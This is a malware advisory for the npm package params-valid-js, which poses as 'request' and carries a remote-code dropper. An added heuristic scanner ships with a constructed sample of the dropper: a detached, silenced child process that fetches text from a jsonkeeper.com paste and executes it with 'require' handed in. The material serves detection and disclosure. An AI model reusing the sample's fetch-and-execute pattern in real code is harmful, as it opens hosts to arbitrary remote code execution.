MAL-2026-5988
Malicious code in params-valid-js (npm)
Details
## Source: amazon-inspector (4f0f4f5cc684f7bf7b40af2f6856c7d5865f57c7492da68af6c1c194741a4629)

params-valid-js impersonates the well-known `request` package (it copies Mikeal Rogers' Apache-2.0 header, points its bugs URL to github.com/request/request/issues, and replicates request's API surface) while shipping a remote-code dropper. index.js exports a function shaped like Express middleware (`(req,res,next)=>next()`) as `module.exports`, `default`, and `reqValidator`. When invoked, the middleware calls `swapJson(...)`, which spawns `node lib/callers.js` with `{ detached: true, stdio: 'ignore' }` and calls `child.unref()`, so the child runs in the background with all of its output concealed. lib/callers.js then performs `axios.get('https://www.jsonkeeper.com/b/5IZTJ')`, extracts `data.Cookie`, and executes the response body with `new Function.constructor('require', s); handler(require);`, passing the real `require` into the fetched code. jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack triggers arbitrary remote code execution on the host.
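An added example, not code from the advisory or the package: a heuristic scanner in JavaScript for the indicators described above (a detached child process with hidden output, text fetched from jsonkeeper.com executed through the Function constructor with `require` handed in, and a package.json bugs URL pointing at a repository whose name differs from the package name). The sample source and manifest are constructed to mirror the described shape; the indicator names and the scoring threshold are my own assumptions.

```javascript
// Heuristic indicators for the dropper pattern described in the advisory.
// Indicator ids and the verdict threshold are assumptions, not a standard.
const INDICATORS = [
  // Background child process with all output hidden (how lib/callers.js is launched)
  { id: 'detached-silent-spawn',
    test: s => /detached\s*:\s*true/.test(s) && /stdio\s*:\s*['"]ignore['"]/.test(s) },
  { id: 'child-unref', test: s => /\.unref\s*\(\s*\)/.test(s) },
  // Fetched text turned into a function that receives `require` as a parameter
  { id: 'function-constructor-with-require',
    test: s => /Function(?:\.constructor)?\s*\(\s*['"]require['"]/.test(s) },
  // HTTP fetch from the mutable paste host named in the advisory
  { id: 'paste-host-fetch',
    test: s => /(axios|https?)\.get\(|fetch\(/.test(s) && /jsonkeeper\.com/.test(s) },
];

// Returns the ids of all indicators present in one JavaScript source file.
function scanSource(src) {
  return INDICATORS.filter(i => i.test(src)).map(i => i.id);
}

// Flags a package.json whose bugs URL points at a GitHub repo not named after the package.
function manifestImpersonation(pkg) {
  const url = (pkg.bugs && (pkg.bugs.url || pkg.bugs)) || '';
  const m = /github\.com\/([^/]+)\/([^/]+)/.exec(String(url));
  if (!m) return null;
  const repo = m[2].replace(/\.git$/, '');
  return repo !== pkg.name ? { name: pkg.name, repo } : null;
}

// Combines source and manifest findings; remote code execution via the Function
// constructor is treated as decisive on its own, otherwise three hits are required.
function verdict(src, pkg) {
  const hits = scanSource(src);
  const impersonation = manifestImpersonation(pkg);
  const score = hits.length + (impersonation ? 1 : 0);
  const malicious = hits.includes('function-constructor-with-require') || score >= 3;
  return { hits, impersonation, malicious };
}

// Constructed sample mimicking the shape the advisory describes (not the real file).
const SAMPLE_SRC = `
const { spawn } = require('child_process');
const child = spawn(process.execPath, ['lib/callers.js'], { detached: true, stdio: 'ignore' });
child.unref();
const axios = require('axios');
axios.get('https://www.jsonkeeper.com/b/EXAMPLE').then(r => {
  const handler = new Function.constructor('require', r.data.Cookie);
  handler(require);
});`;
const SAMPLE_PKG = { name: 'params-valid-js', bugs: { url: 'https://github.com/request/request/issues' } };

console.log(verdict(SAMPLE_SRC, SAMPLE_PKG));
```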
Affected packages
No fixed version published yet for params-valid-js (npm). Pin to a known-safe version or switch to an alternative.